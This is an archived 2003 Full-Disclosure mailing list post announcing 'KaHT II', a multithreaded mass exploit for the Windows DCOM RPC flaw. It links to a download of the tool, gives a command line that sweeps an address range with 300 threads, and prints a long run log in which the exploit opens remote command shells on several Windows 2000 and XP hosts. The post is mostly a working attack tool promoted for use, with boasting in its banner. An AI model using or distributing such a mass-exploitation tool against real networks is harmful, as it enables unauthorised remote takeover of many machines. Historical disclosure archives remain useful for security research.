[Full-Disclosure] KaHT II - Massive RPC Dcom exploit..

From: at4r ins4n3 (at4rat_private)
Date: Mon Aug 11 2003 - 14:20:50 PDT

  • Next message: Arian J. Evans: "RE: [Full-Disclosure] what to do"

    multithreading &os detection && macros support...
    
    exploit can be found here:  www.croulder.com/haxorcitos/kaht2.zip
    
    
    example: KaHT.exe 10.10.40.0 10.10.255.255 300
    _________________________________________________
               KAHT II - MASSIVE RPC EXPLOIT
      DCOM RPC exploit. Modified by aT4rat_private
      #haxorcitos && #localhost  @Efnet Ownz you!!!
    ________________________________________________
    
     [+] Targets: 10.10.40.0-10.10.255.255 with 300 Threads
     [+] Scan In Progress...
    - Connecting to 10.10.40.4
       Sending Exploit to a [Win2k] Server.... FAILED
      - Connecting to 10.10.40.9
       Sending Exploit to a [WinXP] Server.... FAILED
      - Connecting to 10.10.40.12
       Sending Exploit to a [WinXP] Server.... FAILED
      - Connecting to 10.10.40.21
       Sending Exploit to a [WinXP] Server...
     - Conectando con la Shell Remota...
    
    Microsoft Windows XP [Versión 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.
    
    C:\WINDOWS\system32>.
     - Connection Closed
     - Connecting to 10.10.40.52
       Sending Exploit to a [WinXP] Server... FAILED
     . - Connecting to 10.10.40.50
       Sending Exploit to a [Win2k] Server...
     - Conectando con la Shell Remota...
    
    Microsoft Windows 2000 [Versión 5.00.2195]
    (C) Copyright 1985-2000 Microsoft Corp.
    
    C:\WINNT\system32>exit
    
     - Connection Closed
     - Connecting to 10.10.40.62
       Sending Exploit to a [WinXP] Server.... FAILED
      - Connecting to 10.10.40.78
       Sending Exploit to a [Win2k] Server...
     - Conectando con la Shell Remota...
    
    Microsoft Windows 2000 [Versión 5.00.2195]
    (C) Copyright 1985-2000 Microsoft Corp.
    
    C:\WINNT\system32>.
    C:\WINNT\system32>...exit
     - Connection Closed
     - Connecting to 10.10.40.105
       Sending Exploit to a [Win2k] Server... FAILED
      - Connecting to 10.10.40.97
       Sending Exploit to a [Win2k] Server... FAILED
      - Connecting to 10.10.40.116
       Sending Exploit to a [WinXP] Server...
     - Conectando con la Shell Remota...
    Microsoft Windows XP [Versión 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.
    C:\WINDOWS\system32>
    C:\WINDOWS\system32>exit
     - Connection Closed
     - Connecting to 10.10.40.129
       Sending Exploit to a [WinXP] Server...
     - Conectando con la Shell Remota...
    
    Microsoft Windows XP [Versión 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.
    C:\WINDOWS\system32>exit
     - Connection Closed
     - Connecting to 10.10.40.128
       Sending Exploit to a [Win2k] Server... FAILED
      - Connecting to 10.10.40.151
       Sending Exploit to a [WinXP] Server... FAILED
      - Connecting to 10.10.40.163
       Sending Exploit to a [Win2k] Server... FAILED
      - Connecting to 10.10.40.166
       Sending Exploit to a [WinXP] Server... FAILED
      - Connecting to 10.10.40.168
       Sending Exploit to a [WinXP] Server.... FAILED
      - Connecting to 10.10.40.233
       Sending Exploit to a [WinXP] Server... FAILED
      - Connecting to 10.10.40.83
       Sending Exploit to a [WinXP] Server... FAILED
      - Connecting to 10.10.40.238
       Sending Exploit to a [WinXP] Server... FAILED
      - Connecting to 10.10.40.250
       Sending Exploit to a [Win2k] Server...
     - Conectando con la Shell Remota...
    
    Microsoft Windows 2000 [Versión 5.00.2195]
    (C) Copyright 1985-2000 Microsoft Corp.
    
    C:\WINNT\system32>
    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html
    



    This archive was generated by hypermail 2b30 : Mon Aug 11 2003 - 18:35:50 PDT